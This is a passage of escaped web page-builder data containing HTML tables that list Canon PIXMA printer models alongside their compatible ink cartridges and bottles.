width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2870S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"13e8990\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"70107ac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP4200<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP7270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP8770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6870<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2570S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2577S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac4d506\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2645364\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62e0d92\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3570<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3670<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG7570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP160<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP180<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP228<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP237<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP245<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP258<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP276<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2be4aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d0f60c7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP287<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP460<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP476<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP486<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP496<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP497<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP500<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP520<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP530<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP568<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP600<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b289177\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b0d2e40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP610<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP628<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td 